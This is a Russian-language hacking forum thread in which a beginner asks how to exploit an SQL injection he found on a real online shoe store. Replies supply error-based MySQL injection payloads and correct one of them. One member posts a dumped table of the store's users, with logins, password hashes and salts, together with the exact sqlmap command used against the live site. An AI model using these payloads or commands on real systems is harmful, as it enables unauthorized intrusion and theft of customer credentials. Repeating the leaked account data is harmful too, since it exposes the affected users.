Нашел инъекцию, а дальше???

Discussion in 'Песочница' started by joomla, 26 Aug 2015.

  1. joomla

    joomla New Member

    Joined:
    20 Aug 2011
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Здравствуйте, коллеги :D Вообщем недавно решил помимо разработки сайтов научиться взламывать сайты. Нарыл один интересный интернет-магазин, и сразу же нашел SQL инъекцию.

    [​IMG]

    Вообщем что только не придумывал, и union прописывал и т.д.
    Вылетает одна и та же хрень, ошибка синтаксиса. Инъекция работает если ставить " кавычку.

    [​IMG]

    Какие еще могут быть варианты для взлома?
     
  2. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Пробуйте error based вектор. например:
    'or(ExtractValue(1,concat(0x3a,(select(version())))))='1
    или
    '-updatexml(0,repeat(version(),2),2)#
     
  3. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Чувак я советую полностью тебе ссылку закрывать,я её через inurl нашёл .
     
  4. joomla

    joomla New Member

    Joined:
    20 Aug 2011
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    да все равно, кто нашел, тот молодец. Сайт я взломать пытаюсь не для корыстной цели, а для практики.

    ----------------------------------
     
  5. joomla

    joomla New Member

    Joined:
    20 Aug 2011
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Не помогло....
     
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    "))))||1+group+by+concat(version(),floor(rand(0)*2))having+min(0)%23
    в ошибке увидите версию
     
    _________________________
  7. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Тоже не пашет .
     
  8. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    а какого типа эта инъекция, если можно манукльчик ))
     
  9. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    error based
     
  10. joomla

    joomla New Member

    Joined:
    20 Aug 2011
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
  11. hicel

    hicel New Member

    Joined:
    19 Aug 2015
    Messages:
    9
    Likes Received:
    3
    Reputations:
    0
    Пашет всё=)
     
  12. joomla

    joomla New Member

    Joined:
    20 Aug 2011
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    что-то не получается
     
  13. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Убери одну скобку в запросе.
    ")))||1+group+by+concat(version(),floor(rand(0)*2))having+min(0)%23

    Надо ошибки тоже читать.
     
    _________________________
  14. joomla

    joomla New Member

    Joined:
    20 Aug 2011
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    красавчик ))
     
  15. strelok20094

    strelok20094 Member

    Joined:
    26 Mar 2011
    Messages:
    81
    Likes Received:
    6
    Reputations:
    2
    base: w106051
    Table: user
    [5 entries]
    +----------------------+---------------+-------------------------------+-------------+
    | email | password | salt | login |
    +----------------------+---------------+-------------------------------+-------------+
    | @ya.ru | $2nWSDmGDU.V6 | $2a$14$2JzmyFg/HuG55/xYBrIXMA | delvin |
    | @altlogic.ru | $22dAubujSFfU | $2a$14$EnpIvtkw.xRbLRzjwbquxg | admin |
    | @mail.ru | $2JpCew0SKvc. | $2a$14$ltDzAFvK5i0qU33i2nvaPg | durova_vita |
    | @tagan.ru | $24LkUVLWIjU2 | $2a$14$tk2uQd0jCUpmApJ6kmSB/g | dmi |
    | @gmail.com | $2KvStv//sqiM | $2a$14$VNPbpZZMDzNBW8Lt9JD6dw | obuvka |
    +----------------------+---------------+-------------------------------+-------------+

    sqlmap -u "http://обувъка.рф/shop/product/filter?productFilter[_ef][gender][]="*" --dbms Mysql --time-sec 10 --threads 10 --level 3 --risk 3 --technique E -D w106051 -T user -C email,password,salt,login --dump
     
  16. joomla

    joomla New Member

    Joined:
    20 Aug 2011
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Можете рассказать как сделали?
     
  17. hicel

    hicel New Member

    Joined:
    19 Aug 2015
    Messages:
    9
    Likes Received:
    3
    Reputations:
    0
    sqlmap гугли...
     
  18. joomla

    joomla New Member

    Joined:
    20 Aug 2011
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    От души
     
  19. hicel

    hicel New Member

    Joined:
    19 Aug 2015
    Messages:
    9
    Likes Received:
    3
    Reputations:
    0
    Так то думать надо .... читать ...
    (sqlmap - хороший софт, но лучше учись сам раскручивать ИМХО.)
     
  20. darkart

    darkart Member

    Joined:
    28 Oct 2015
    Messages:
    12
    Likes Received:
    6
    Reputations:
    0
    зачем изобретать велосипед? есть софт он работает
    по логу можно понять что происходит
    а вот если автоматизация не прокатила то да имеет смысл копать руками!
    п.с. имхо